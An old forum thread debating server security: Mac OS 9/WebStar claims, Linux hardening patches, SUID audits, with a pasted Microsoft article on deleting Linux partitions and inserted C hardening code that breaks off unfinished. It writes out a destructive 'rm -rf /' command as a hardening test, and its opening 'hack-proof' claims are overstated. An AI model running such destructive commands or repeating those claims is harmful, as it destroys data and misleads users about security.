The MacOS running WebStar as a server has never been exploited.
In fact in the entire securityfocus (bugtraq) database history there has never been a Mac exploited over the internet remotely.
That is why the US Army gave up on MS IIS and got a Mac with WebStar.
I am not talking about BSD derived MacOS X (which already had a couple of exploits) I am talking about Mac OS 9 and earlier.
Why is is hack proof? These reasons
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT
2> No Root user. All mac developers know their code is always running at root. Nothing is higher (except undocumented microkernel stufff where you pass Gary Davidians birthday into certain registers and make a special call). By always being root their is no false sense of security.
3> Pascal strings. ANSI C Strings are the number one way people exploit Linux and Wintel boxes. The mac avoids C strings historically in most of all of its OS. In fact even its roms originally used Pascal strings. As you know pascal strings are faster than C (because they have the length delimiter in the front and do not have to endlessly hunt for NULL), but the side effect is less buffer exploits.
4> Stack return address positioned in a safer location than on Intel. Buffer exploits take advantage of loser programmers' lack of string length checking and clobber the return address to run their exploit code instead. The Mac places the return address in front of where the buffer would overrun. Much safer.
5> Macs running WebStar have the ability to only run CGI placed in the correct directory location and correctly file typed.
6> Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing. For example the file type is 4 characters of user-invisible attributes, along with many other invisible attributes, but these 4 bytes cannot be set by most tool oriented utilities that work with data files. For example file copy utilities preserve launchable file-types, but JPEG MPEG HTML TXT etc oriented tools are physically incapable of creating an executable file. The file type is not set to executable for the hacker's needs. In fact it's even more secure than that. A Mac cannot run a program unless it has TWO files. The second file is an invisible file associated with the data fork file and is called a resource fork. EVERY Mac program has a resource fork file containing launch information. It needs to be present. Typically JPEG, HTML, MPEG, TXT, ZIP, C, etc are merely data files and lack resource fork files, and even if they had them they would lack launch information. But the best part is that Mac web programs and server tools do not create files with resource forks usually.. TOTAL security.
7> There are fewer Macs, though there are huge cash prizes for cracking into a MacOS based WebStar server. Fewer Macs means less hacker interest, but there are millions of Macs sold, and some of the most skilled programmers are well versed in systems level Mac engineering and know of the cash prizes so it's a moot point, but perhaps Macs are never kracked because there appear to be fewer of them. (Many Macs pretend they are Unix and give false headers to requests to keep up the illusion: ftp, http, finger, etc.)
8> MacOS source not available traditionally, except within Apple; similar to Microsoft source availability to its summer interns and such, source is rare to MacOS. This makes it hard to look for programming mistakes, but I feel the restricted source access is not the main reason the MacOS has never been remotely broken into and exploited.
Sure a fool can install freeware and shareware server tools and insecure 3rd party add-on tools for e-commerce, but a Mac (MacOS 9) running WebStar is the most secure web server possible and WebStar offers many services as is.
I think it's quite amusing that there are over 200 or 300 known vulnerabilities in RedHat over the years and not one MacOS remote exploit hack.
not one ever.
The information in this article applies to:
* Microsoft Windows XP Home Edition
* Microsoft Windows XP Professional
For a Microsoft Windows 2000 version of this article, see Q247804.
Summary
This article explains how to remove the Linux operating system from your computer and install Windows XP. This article assumes that Linux is already installed on your computer's hard disk, that Linux native and Linux swap partitions are in use (which are incompatible with Windows XP), and that there is no free space left on the hard disk.
NOTE: Windows XP and Linux can coexist on the same computer. For additional information, refer to your Linux documentation.
More Information
To install Windows XP on a computer on which Linux is currently installed (and assuming that you want to remove Linux), you must manually delete the partitions used by the Linux operating system. The Windows-compatible partition can be created automatically during the installation of Windows XP.
IMPORTANT: Before you follow the steps in this article, verify that you have a bootable disk or bootable CD-ROM for the Linux operating system, because these steps completely remove the Linux operating system from your computer. If you intend to restore the Linux operating system at a later date, verify that you also have a functional backup of all the information stored on your computer. Additionally, you must have a full release version of Windows XP to use during this installation. If you intend to use a Windows XP upgrade CD-ROM, a CD-ROM of a qualifying Windows product must be available. Setup from the Windows XP upgrade CD-ROM will prompt you for this CD-ROM.
Linux file systems use a superblock at the beginning of a disk partition to identify the basic size, shape, and condition of the file system.
The Linux operating system is generally installed on partition type 83 (Linux native) or 82 (Linux swap). The Linux boot manager (LILO) can be configured to start from either of the following locations:
* The hard disk Master Boot Record (MBR)
-or-
* The root folder of the Linux partition
The Fdisk tool included with Linux can be used to delete the partitions. (There are other utilities that work just as well, such as Fdisk from MS-DOS 5.0 and later, or you can delete the partitions during the installation process.)
To remove Linux from your computer and install Windows XP, follow these steps:
1. Remove the native, swap, and boot partitions used by Linux: Start your computer with the Linux Setup floppy disk, type fdisk at the command prompt, and then press ENTER. NOTE: For help with using the Fdisk tool, type m at the command prompt, and then press ENTER.
2. Type p at the command prompt, and then press ENTER to display partition information. The first item listed is hard disk 1, partition 1 information, and the second item listed is hard disk 1, partition 2 information.
3. Type d at the command prompt, and then press ENTER. You are then prompted for the partition number that you want to delete. Type 1, and then press ENTER to delete partition number 1. Repeat this step until all the partitions have been deleted.
4. Type w, and then press ENTER to write this information to the partition table. Some error messages may be generated (because information is written to the partition table), but they should not be significant at this point because the next step is to restart the computer and then install the new operating system.
5. Type q at the command prompt, and then press ENTER to quit the Fdisk tool.
6. Insert either a bootable floppy disk or the bootable Windows XP CD-ROM, and then press CTRL+ALT+DELETE to restart your computer.
7. Follow the instructions on the screen to install Windows XP.
The installation process assists you in creating the appropriate partitions on your computer.
Sample Linux Partition Tables
Single SCSI Drive
Device Boot Start End Blocks Id System
/dev/sda1 * 1 500 4016218 83 Linux native (SCSI hard drive 1, partition 1)
/dev/sda2 501 522 176715 82 Linux swap (SCSI hard drive 1, partition 2)
Multiple SCSI Drives
Device Boot Start End Blocks Id System
/dev/sda1 * 1 500 4016218 83 Linux native (SCSI hard drive 1, partition 1)
/dev/sda2 501 522 176715 82 Linux swap (SCSI hard drive 1, partition 2)
/dev/sdb1 1 500 4016218 83 Linux native (SCSI hard drive 2, partition 1)
Single IDE Drive
Device Boot Start End Blocks Id System
/dev/hda1 * 1 500 4016218 83 Linux native (IDE hard drive 1, partition 1)
/dev/hda2 501 522 176715 82 Linux swap (IDE hard drive 1, partition 2)
Multiple IDE Drives
Device Boot Start End Blocks Id System
/dev/hda1 * 1 500 4016218 83 Linux native (IDE hard drive 1, partition 1)
/dev/hda2 501 522 176715 82 Linux swap (IDE hard drive 1, partition 2)
/dev/hdb1 1 500 4016218 83 Linux native (IDE hard drive 2, partition 1)
Additionally, Linux recognizes more than 40 different partition types, including the following:
* FAT 12 (Type 01)
* FAT 16 > 32 M Primary (Type 06)
* FAT 16 Extended (Type 05)
* FAT 32 w/o LBA Primary (Type 0b)
* FAT 32 w/LBA Primary (Type 0c)
* FAT 16 w/LBA (Type 0e)
* FAT 16 w/LBA Extended (Type 0f)
Note that there are other ways to remove the Linux operating system and install Windows XP. The preceding method is included in this article because of the assumptions that the Linux operating system is already functioning and there is no more room on the hard disk. There are methods for changing partition sizes with software designed for managing partitions. Disk partitioning software may cause instability with the Windows XP installation. Microsoft does not support the installation of Windows XP on partitions manipulated in this manner.
You can also use an MS-DOS version 5.0-or-later boot disk, a Microsoft Windows 95 Startup disk, or a Microsoft Windows 98 Startup disk that contains the Fdisk utility to remove an operating system from the hard disk and install a different operating system. When you start Fdisk and multiple drives are installed on your computer, you are presented with five choices; use option 5 to select the hard disk that has the partition to be deleted. After that (or if you have only one hard disk), select option 3 (Delete partition or logical DOS drive), and then select option 4 (Delete non-DOS partition). You should then see the non-MS-DOS partitions that you want to delete. Typically, the Linux operating system has two non-MS-DOS partitions, but there may be more. After you delete one partition, use the same steps to delete any other appropriate non-MS-DOS partitions.
For additional information about how to use the Fdisk utility, click the article number below to view the article in the Microsoft Knowledge Base: Q255867 How to Use the Fdisk Tool and the Format Tool to Partition or Repartition a Hard Disk
After you delete the partitions, you can create partitions and install the operating system that you want. You can create only one primary partition and an extended partition with multiple logical drives by using Fdisk from MS-DOS version 5.0-and-later, Windows 95, and Windows 98. The maximum FAT16 primary partition size is 2 gigabytes (GB). The largest FAT16 logical drive size is 2 GB.
For additional information, click the article number below to view the article in the Microsoft Knowledge Base: Q105074 MS-DOS 6.2 Partitioning Questions and Answers
When you install Windows XP, the Linux partitions can be removed and new partitions created and formatted with the appropriate file system type during the installation process. Windows XP allows you to create more than one primary partition. Windows XP does recognize the FAT32 file system. During the installation of Windows XP, you can create a very large FAT32 drive. The FAT32 drive can be converted to NTFS after the installation has completed, if appropriate.
For additional information about how to multiboot with Windows XP, click the article number below to view the article in the Microsoft Knowledge Base: Q306559 HOW TO: Create a Multiple-Boot System with Windows XP
For more information, browse to the following Microsoft Web site:
http://www.microsoft.com/windows2000/techinfo/administration/management/mltiboot.asp
The third-party contact information included in this article is provided to help you find the technical support you need. This contact information is subject to change without notice. Microsoft in no way guarantees the accuracy of this third-party contact information.
The third-party products discussed in this article are manufactured by vendors independent of Microsoft; we make no warranty, implied or otherwise, regarding these products' performance or reliability.
- posted by poopbot: providing truth in a deceitful world
BHlT0MEz1m Post #770
I'm surprised no one has pointed out systrace yet. Granted, it's not for Linux, only OpenBSD and NetBSD at this point, but it seems to be a very promising move in the ACL world. As one other poster commented, the most difficult challenge with any heavily ACL'ed environment is configuring the ACLs and making sure you didn't miss something. It's an extremely tedious process that requires a lot of reloads until it's done right.
Systrace eliminates much (but not all) of that initial trial period with a method of analyzing processes, watching what permissions for what resources they need, and generating ACLs based on 'normal' use. This interactive mode ~greatly~ simplifies the otherwise lengthy process of configuring the kind of security modules being discussed.
No Debian package... :(
Buy an abacus and a typewriter.
Sample here.
What part of "gestalt" don't you understand?
This past January-June, I worked on a project involving LIDS. I was responsible for all the setup/maintenance. Setup for LIDS is extremely easy. The difficult part is setting up the ACLs. For a complex system with many daemons running, this might be a difficult task. Fortunately, you can find plenty of people who make their ACL lists public, so you can see how to set up common things such as Sendmail, Apache, SSH, etc. With a good ACL list, your box will be as secure as it can get. With constant attacks on our LIDS box, no one ever got total control. The one time we let someone get root (for research purposes), that person was not able to do anything (even root can be made to not have certain accesses). I highly recommend LIDS to anyone looking for a more secure Linux.
So why aren't we all using Mac OS for webservers? (excluding OS X)
- It's a major PITA to do any kind of remote management. While the lack of a command prompt may make it hard to hack, it also makes it nearly impossible to administer remotely (unless you resort to a VNC-like solution, in which case you are subject to all the flaws of that solution)
- Macs are expensive. Look at XServe. Look at comparable Linux servers. XServe is expensive.
- Lack of software: Mac OS wasn't traditionally a server OS, so many of the tools that we know and love in Linux and even Win32 are missing
- Mac OS 9 Sucks: Memory management, swap management, networking, etc. Mac OS 9 makes Windows 98 look like a reliable, stable system.
This is not to say that Mac OS doesn't have a place as a server. For applications where security is critical and remote access, cost, or performance isn't a priority, it's certainly a viable option. It's perfect for the Army: cost and performance are not issues (they have a $300 billion/year budget, and if it's too slow they can just invest in better hardware), but security is a MUST.
I work in a small company, with a small server room. It has two RS-9000s, one Compaq tower, and one HP LH-something. The information isn't really worth stealing, and you would have to walk through the entire IS department to get the hardware out.
Yet, we got slapped by our corporate owner's internal audit for leaving the door open. We now have to keep it closed at all times. Unfortunately the IT department is so understaffed that everyone has reason to be in that room; we don't have the resources for a dedicated operator that can serve our development needs and the actual day to day needs of the company.
So there is one key, where everyone knows where it is. This isn't protecting anything, ever. Sure physical security is important, but should you weigh the risk?
This has real potential for locked-down servers, kiosk systems, etc. It's a bit stringent for most desktops. But it's not too hard to use.
Unfortunately this seems to have been the principal result of Microsoft's much vaunted house-keeping. The net result does not seem to be a reduction in the number of existing security bugs.
See my journal, I write things there
By taking the time to respond to it, what does that make you?
You can find the site at MicroBSD.Net
1) Agreed
2) No Root users? Bzzz...every user is a root user. This means if/when exploits do happen, the ability for them to ALWAYS be fatal is ALWAYS there.
3) The #1 biggest reason why remote exploits will be rare. This, and only this, is the primary reason.
4) Moot issue since pascal strings minimize that vast majority of these issues to begin with.
6) Pretty much every real OS has this concept. Mac is hardly alone.
7) True, being a minority does help. Other OS's play header tricks too. On the other hand, this also means much fewer selections in available applications which mean odds are automatically reduced in the number of possible exploits. Basically, zero applications means zero odds of being exploited. I think you can follow the logic from there.
8) Security through obscurity can sometimes help but rarely is the solution. In fact, history proves that this often creates more problems than it fixes because fewer eyes ever see enough code to fix it before it becomes a problem.
You can find the Site at MicroBSD.Net
Macs have astounding performance...
For example.. a stock Dual 1 GHz G4 Mac performs over TWICE as many RC5 keys per second as the fastest dual AMD MP motherboard.
And that Mac is under 2999 dollars and comes with a DVD-R burner (a 300 dollar value).
TWICE as many RC5s per second than an AMD, probably because Macs have huge L3 caches, and no AMD have a L3 cache.
Also Macs can read and write simultaneously to a cold page of ram faster than any AMD mother board can. Perhaps RC5 benefits from this as well.
Mac file system is fast too... very fast compared to most UNIX filesystems.
http://projectfiles.com/firewall/ It looks simple...potentially a good thing. Anyone have experience with this yet?
One of the best ways to keep your system secure is to keep it simple: remove daemons, remove kernel modules, remove software you don't need, etc.
he's saying that OBSD IS well documented if anything (you seemed to interpret the negative), that is in addition to his saying he thinks that it is "quite good"
What are you? A moron or something? Let me guess. The only reason you can possibly use a computer is because you have a mouse. This is such a bunch of bs. Security at Microsoft is like white shit. It doesn't exist until it's so old as to be un-needed. Personally, I believe in the right tool for the right job. MS or Unix(Linux), doesn't matter. I do what the customer wants. Security wise, I know better than to trust anything M$ does or says about security. Their track record speaks for itself. As far as Linux goes, no flames here, I like it, I started with it, but BSD makes my life easy, and you can't beat the security auditing that OpenBSD goes through. Not to mention; lately, OpenBSD runs better on antiquated hardware than Linux used to.. So much for keeping the kernel small and lightweight.
Go post on an MS newsgroup you asshole. Maybe you can find some dumbass to believe you long enough for you to get paid.
at sourceforge has been in dev for years
Open source is great, but takes way too much patience to get anything done... Linux is coming along great, but look how old it is.
LOL
XServe is better compared to a Sun Netra T1 than to a "Linux server".
Most linux servers are junk. VA made some of the biggest piles of junk. Those 1st gen boxes? LOL. FullOn? BAH, garbage.
Penguin Computers? junk.
Compaq makes nice boxes, and they do run Linux.
I used to run LIDS and grsecurity, but now I feel that the ACL system in grsecurity is more powerful than that in LIDS.
Grsecurity's non-ACL options are awesome. No setup, and almost all programs work as before (except some programs that need stack execution, but that is a piece of cake to fix).
BUT (and here comes my main point) the ACL system (both in grsecurity and from my earlier experience with LIDS) needs more debugging. LIDS once released a version where you couldn't run (almost) any program because of the LD_LIBRARY flags, and grsecurity gives me a kernel panic every now and then. No problem on my system, it gives me an excuse for poking in the kernel source, but I would never use the ACLs on a production system.
I don't know the facts about Linux, specifically, but there is a push in the *BSD world for kernel security features to be incorporated as defaults.
The only one I recall off the top of my head is "non-executable stacks" to keep stack overflow attacks from being quite as easy. I'm sure it has other advantages, as well.
All this does is "raise the bar" for attackers. I'm assuming most of the Linux kernel security tweaks do the same.
-- clvrmnky
I'm going to make a point.
Whether you listen or not is up to you.
Number one reason a Mac server has never been hacked? What companies run them? Like the other poster said, their internal memory management sucks. And yes, for most people running a server PERFORMANCE MATTERS.
Next is the interest level: what l33t hacker would be even the slightest bit interested in this? I have not yet seen or heard anybody in the community talking about how 'hard' or 'interesting' a Mac hack would be, because nobody who matters (big companies, banks etc..) runs them.
And source being available or not doesn't matter; it never has. The problem with bugs being easier to find is offset by the speed a fix is available. Look at NT4: it has an estimated 65,000 bugs. Nobody can find them because the source isn't there, right? WRONG! All it takes is some creative testing and reverse engineering and you can find them. Conversely look at Red Hat: 300 known bugs, right? How many of them are patched? 99%? And of the ones that are not, how easy are they to exploit?
Either way it comes down to one thing: intelligence of the admin. Servers were not and are not made for Joe Schmoe to run. PERIOD. All these people who complain about how 'hard' it is to admin a Unix server SHOULDN'T be doing it in the first place.
Oh, and I'd also like to point out that unless a blackhat wants to go corporate he won't go for a cash prize, because it puts the spotlight onto him, and that is a BAD THING (tm) when you are doing "illegal things".
"Two things are infinite: the universe and human stupidity; and I'm not sure about the universe." --Albert Einstein
I quote from Usenix88:
Indeed there are ways to do closures without an executable stack, usually by modifying a stub that resides in the text segment of a binary, but it's much nastier. Better would be to use other existing tools for buffer overruns IMHO.
It seems to me LSM (Linux Security Module) is the former SELinux (Security Enhanced Linux) from NSA. The LIDS (Linux IDS) is totally independent. The news is that LSM has been accepted into the development kernel tree.
Think... What is the single most unreliable "trusted" element of your security setup? Your staff.
Be nice to your PFY(s) people! :)
Ali
Ph33r m3!!!
And -- I'm sorry to break the news to you. But I used to work at an ISP whose pages were served on a WebStar... Till somebody erased all the clients' pages twice... And then I put a RedHat/Apache/Intel box in its place. Worked like a charm...
Nice troll.
In what sense is garbage collection a security feature? That makes no sense.
I'm sorry I can't give a better reference, but search google for "virtual machine halting problem". Vaguely, if a virtual machine does not have garbage collection, proving that some code is "safe" (in the sense "will not dump core") is tantamount to solving the halting problem. So GC is relevant to the security of VMs. For java, at least, this form of security is most important for applets running on the client side. For C, garbage collection would be useful simply to discourage use of static fixed-size buffers by encouraging the use of lots of dynamic memory management. But that's an issue of practical code habits, not computer science.
- time = money
- knowledge = power
- power = work / time
- knowledge = work / money
- knowledge * money = work
- money = work / knowledge
- therefore, as knowledge --> 0, money --> infinity!
QED
-cpeterso
www.kerneli.org
EOF
You must feel kinda silly now that the recent OpenSSH ChallengeResponse bug can root a default OpenBSD remotely in seconds...
I don't consider myself a full-on security guru, but from my experience, Immunix has a very good track record. Crispin Cowan has published many white papers concerning the StackGuard compiler and how it will prevent buffer overflow attacks. Combine this with FormatGuard, and a reasonable price ($100, free for non-commercial use). Check it out at http://wirex.com/Products/Immunix/purchase.html.
Don't forget to use Bastille to harden it after you install. Or you could do it manually; then you will need to remove SUID crap, use chattr to make your critical conf files immutable, and many, many other tricks. You can read about it at http://www.bastille-linux.org/. Hope that helps.
I may be bad with names, but I'll never forget your IP address
All these add-ons are nice, but you can easily have a very hardened server without installing or patching anything. Linux, *BSD and probably other operating systems have had extended fs attributes for ages.
With standard commands like chflags (BSD) or chattr (Linux), you can mark files and directories read-only (immutable) or append-only.
The point is that once you have a working system, and if you have local access to the console, you can set proper attributes on all your files.
You then have the concept of "security levels". Once your box is in multi-user mode, the "security level" can increase, and a lot of things will be refused by the kernel: changing firewall rules, access to kmem, to raw devices, etc., and changing extended attributes.
So even if an attacker gets root access on your box, he won't be able to alter anything except some ever-changing files (something that can be solved by using an NFS mount). And the append-only log files are really nasty, because he won't be able to hide what he's doing. Patch your favorite shells to always log history files to an append-only file to get even more fun.
On a properly configured box (that you have console access on), you must be able to run "rm -rf /" as root, and your system must still be up and running. No need for any integrity checker.
...their existence points at a deeper problem. The Linux security model is based off of the Unix security model which basically expected users to do two things:
1. Log in through a text mode terminal.
and
2. Run programs (i.e. use cpu time and memory).
Since the demands of computer users began to expand beyond those original expectations (graphical interface, selective access to administrative abilities, etc...) the solution has always been to write a suid program that simply snags root privileges and tries not to let the user do anything bad while it's running. Sure, it works, and Linux-based systems have come a long long way, but the fundamental problem remains: to the OS, a user is a user is a user (except root). The Linux security model hasn't expanded to meet new challenges; it's been circumvented by suid programs, and as a result instead of a single point of possible penetration (a problem with the kernel) there are hundreds of possible ways to take over the system and hundreds of programs that must be maintained in order to keep the system secure.
Yes, chroot is an absolutely beautiful solution in many cases. No, I'm not saying linux is terribly insecure. What I am saying is that a new philosophy needs to be employed in designing security models: if a program has to become root (or the equivalent) to perform its function, something is wrong with the security model. It seems to me that this kind of thinking, combined with an elegant system to keep track of who is allowed to do what, would do wonders for the maintainability and usability of linux based OSs.
Like we all buy computers to leave them around running RC5 code... A single cpu AMD will smoke your dually G4 at mpeg encoding by 70%, and that will cost you less than $800.
One of the biggest problems with SELinux is the non-trivial effort involved in creating policies. It took me a couple of nights just to get to grips with the concepts...
There's a real need for some sort of tool that just builds and manages simple policies for daemons, apps & utilities. Problem is, that sort of thing is best built upon a sound model of the policy. apol (http://www.tresys.com/selinux.html) has something, and there's work going on at IBM (Alphaworks?) and at MITRE, all of it very cool stuff, but it's a) geared towards analysis, and b) proprietary.
Bastille linux is a hoax.
It doesn't secure anything at all.
Patching the Linux kernel (grsecurity, etc.) and implementing ACLs is one level of security enhancement one can employ.
Userspace hardening (e.g. Bastille) is another.
Virtual servers sound like an interesting approach as well (virtual servers running a grsecured, hardened system anyone?)
But, security for things like web services do not end with kernel patches or even userspace hardening utilities.
As [...] noted here, the 'security' of Slashdot's moderation system has been shot to hell (astroturfers of various ilks, most commonly but not exclusively Microsoft paid lackeys, and outright trolls are posting at +2 and being granted moderator privileges on a daily basis). As to whether the above troll you reference was moderated up by trolls, Microsoft astroturfers, or a combination is anyone's guess.
The fix is obviously for the Slashdot editors to begin creating a web of trust in a similar fashion to how GPG/PGP keys are managed (complete with revocation if that trust is abused). Initially only the Slashdot moderators and some well known friends of theirs would be in the ring of trust, then gradually others (based upon posting content, relationships, what have you). This would at least allow the astroturfers and trolls to have their moderation and/or +2 posting privileges removed when they do occasionally slip through.
In the meantime, until such an approach is taken, I'm afraid the astroturfers and trolls will continue to abuse the moderation system for the foreseeable future. Numerical benchmarks such as karma simply do not cut it when trying to filter for quality of content, discussion, moderation, and meta-moderation.
Slashdot security in a discussion of security now rates a -3 Offtopic?
So, by pointing out that security for a web server doesn't stop at kernel patches, and pointing to a real world example to underscore that point (this very site), the comment is somehow now offtopic? I think this thread makes the aforementioned example even more pointed than it already was.
Or is self-criticism now a taboo subject on this forum? Remarkable.
The Future of Human Evolution: Autonomy
Erasing pages is one thing.
But turning your linux machine into a staging point for going after other targets is another, more serious problem.
The only reason one would consider using a pre-Mac OS X server is
1) Without memory protection, a random buffer overrun attack may lock up the computer, a better situation than just crashing the app and letting the system go on.
2) If the attacker does manage to subvert the program, it's impossible to start up a remote command shell.
3) If the attacker does manage to get a remote command shell going, it's impossible to find command-line applications installed on the Mac that will allow downloading of files and the installation of backdoored programs.
4) Making a compromised Mac a dead end deal, ie. nothing much else can be done.
Issues with webpages being deleted can be easily worked around with a good backup/replication/etc. Hell, have the webpages served off a read only AppleShare that's connected to the actual webserver, the attacker won't be able to alter your web data.
I know you're all too lazy to read the entire release notes, so jump directly to the source of these tools. RedHat's release notes say:
This beta contains a kernel providing EA and ACL support for the ext3 filesystem based on the patches and user-level tools from http://acl.bestbits.at/
So, check them out directly. They have more information than the RELEASE-NOTES, and some useful examples.
don't just make an assertion, back it up. unsupported claims are pointless.
you may have a point to make, but you didn't make it here; you didn't teach us anything.
if i'm a grammar nazi, you're an illiteracy nazi.
I wouldn't say it secures *nothing*. In fact, I'd say it secures a lot of things many people don't even think about. But you are right, it's not as strong in the "prevent the buffer overflows" category, and most of the things it does a good admin would do by hand anyway.
It's got some pretty good file permission changes that work very well for server environments. And yes, file permissions really do matter. Even on the simplest level it will ask you to remove SUID permissions from ping, dump, traceroute, at, etc. I know for sure there's been at least one local user -> root user exploit for dump that would be foiled if it were non-suid. There was even one this year for at which allowed the same privilege elevation on RedHat versions prior to 7.2:
http://rhn.redhat.com/errata/RHSA-2002-015.html
Of course, a good admin should go through and audit which files are SUID him or herself and kill off ones which aren't used by non-root users. But this makes it a bit easier.
And yes, removing the SUID bits does make fewer commands available to non-root users, but let's face it, do non-root users really need to be able to run traceroutes and backups from your webserver?
-Matt
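An added example of the SUID audit Matt describes, not his code and not from any tool named in this thread: a small C program that walks a directory tree, lists every setuid/setgid regular file, and can clear the bits on a file you decide non-root users do not need. The default root directory (/usr/bin) and the temporary directory used by the self-check are assumptions of the example.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Recursive walker: appends the paths of setuid/setgid regular files found
 * under `dir` to out[]. Uses lstat() so symlinks are never followed, which
 * keeps a planted symlink loop from stalling the audit. Returns the new count. */
static int walk(const char *dir, char **out, int max, int count)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return count;                     /* unreadable directory: skip it */
    struct dirent *e;
    while (count < max && (e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        char path[PATH_MAX];
        if (snprintf(path, sizeof path, "%s/%s", dir, e->d_name) >= (int)sizeof path)
            continue;                     /* over-long path: skip it */
        struct stat st;
        if (lstat(path, &st) != 0)
            continue;
        if (S_ISDIR(st.st_mode))
            count = walk(path, out, max, count);
        else if (S_ISREG(st.st_mode) && (st.st_mode & (S_ISUID | S_ISGID)))
            out[count++] = strdup(path);
    }
    closedir(d);
    return count;
}

/* Collect up to `max` setuid/setgid files under `root`; caller frees each entry. */
int find_setid_files(const char *root, char **out, int max)
{
    return walk(root, out, max, 0);
}

/* Clear the setuid and setgid bits on `path`, keeping every other mode bit.
 * Returns 0 on success, -1 on failure (errno set by stat/chmod). */
int strip_setid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return chmod(path, (st.st_mode & 07777) & ~(S_ISUID | S_ISGID));
}

/* Round trip on a constructed temporary tree (an assumption of this example,
 * not a real system path): plant one setuid file, confirm the audit reports
 * exactly it, strip the bit, confirm the report is then empty. Returns 1 on success. */
int selfcheck(void)
{
    char dir[64] = "/tmp/suidauditXXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "suidauditXXXXXX");   /* fall back to the current directory */
        if (mkdtemp(dir) == NULL)
            return 0;
    }
    char file[PATH_MAX];
    snprintf(file, sizeof file, "%s/fakeping", dir);
    int fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0755);
    if (fd < 0)
        return 0;
    close(fd);
    int ok = 0;
    char *hits[8];
    if (chmod(file, 04755) == 0) {
        int before = find_setid_files(dir, hits, 8);
        int stripped = strip_setid(file);
        int after = find_setid_files(dir, hits + before, 8 - before);
        ok = before == 1 && strcmp(hits[0], file) == 0 && stripped == 0 && after == 0;
        for (int i = 0; i < before + after; i++)
            free(hits[i]);
    }
    unlink(file);
    rmdir(dir);
    return ok;
}

int main(int argc, char **argv)
{
    const char *root = argc > 1 ? argv[1] : "/usr/bin";
    char *hits[4096];
    int n = find_setid_files(root, hits, 4096);
    for (int i = 0; i < n; i++) {
        printf("%s\n", hits[i]);
        free(hits[i]);
    }
    fprintf(stderr, "%d setuid/setgid files under %s\n", n, root);
    return 0;
}
```

Run it as ./suid_audit / (or per tree) and go through the list the way the post suggests: anything on it that only root ever needs (dump, traceroute, at on a webserver) is a candidate for strip_setid().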
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT
Macs have AppleScript which allows a script to do basically anything a shell could. If someone breaks in, they need only activate an AppleEvent to download some trojan code and execute that trojan code.
3> Pascal strings. ANSI C Strings are the number one way people exploit Linux and Wintel boxes.
This is an excellent point, but buffer overflows can occur with arrays and other data structures. Furthermore, while the OS may use Pascal strings, applications that run on top of the OS can use any type of string they choose.
5 : Macs running Webstar have the ability to only run CGI placed in the correct directory location and correctly file typed.
Where is this enforced? If Webstar is enforcing this, once someone breaks into the system, it will make no difference. The intruder is already root.
6> Macs never run code ever merely based on how a file is named. ",exe" suffixes mean nothing.
It is a trivial matter to change a file type.
In what sense is garbage collection a security feature? That makes no sense.
It's not garbage collection as much as direct memory access and management. In C, it's very easy to accidentally write something that allows for the execution of arbitrary code. In Java, it's very hard.
This is similar to the way one should write banking code. For most of the programmers, there should be no way to add money to an account or remove money from an account. Instead, you just give them an API that allows transfers. That way you eliminate a whole class of possible errors.
The OP's confusion probably comes from the fact that once you remove free(), garbage collection is the common solution.
Owl is something that I admire and would even run if it wasn't based around RPM. They've managed to create a system that could probably be run without any suid programs.
Even chfn and passwd work, since they have split /etc/shadow into a tree, and each user has its own fragment that is only writable by that user. There's a bit of glibc/nsswitch magic to use that tree instead of the usual flat file, and the rest of the system just works as before.
There are other "duh, why didn't I think of that" changes, too. Think about it - why do syslogd and klogd keep root after starting? klogd needs to open a socket from the kernel. After that, does it need root? Nope. syslogd needs to be able to open logs and sometimes bind to a privileged port. Guess what, a user called 'syslogd' can open log files owned by syslogd, and it can drop root after it grabs that port. Owl also chroots klogd into a jail to keep it out of trouble once it starts.
I look forward to seeing this kind of cluefulness in other distributions, since it's obviously correct.
I wonder if this person works for StarNine?
Same post, different topic...
[RIAA] says its concern is artists. That's true, in just the sense that a cattle rancher is concerned about its cattle.
You may want to look at the fnk (or cipherfunk) kernel tree (no this is not carried on kernel.org). The link at freshmeat for cipherfunk kernels has connections for downloading and so on. His kernel tree contains the GRSecurity patches, a fair number of other patches (eg: FreeS/WAN), and any fixes he's made to get the lot running.
Basically this guy's motivation is security and stability. He puts the whole lot through a barrage of tests, and makes sure things work, or at least determines if there is a problem and makes note of it.
1. Add a sys call to disable insmod to prevent crackers from inserting Trojans and Root Kit obscuring modules.
2. Disable processes from listening on high ports (above 1023, except possibly socks, NFS, or X if you're crazy to allow these on a server). It would be trivial to add this to the kernel.
3. Disable other than low numbered processes from listening on ports, if all of your servers start at boot time and don't need restarting.
4. Prevent creation of symlinks in dirs (such as /tmp) with the sticky bit on unless they point to files owned by the creator. This reduces popular symlink attacks. It might be possible to block all symlinks here with most servers' mix of processes.
5. Disable fchdir() and mknod() to prevent root's common way to break out of a chroot() jail. (Disabling /proc, /dev/mem and /dev/kmem, etc. also will be needed but those aren't kernel mods.)
Keeping up-to-date w.r.t. security patches, running different servers on different systems to limit damage from an intrusion, using a good Adaptive Firewall and IDS, etc. will go a long way to conventional security as will using the LIDS, WireX's SubDomain, or NSA-enhanced kernels.
Those worrying about a NSA-planted bug in their kernel need only put a non-NSA Linux based Firewall in front to detect unexpected packets.
These and other ideas are from my book.
Bob Toxen, Author, Real World Linux Security, 2nd Ed.
Security Consulting,
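Item 4 above (refuse to follow a symlink in a sticky, world-writable directory unless its owner is the follower or the directory owner) is the rule that Linux later shipped as the fs.protected_symlinks sysctl. As an added example, not Bob Toxen's code and not the kernel's: a C version of that decision as a pure function, a wrapper that applies it to a real path, and the application-side defence (O_EXCL|O_NOFOLLOW) that works even without kernel help. The temporary directory in the self-check is constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

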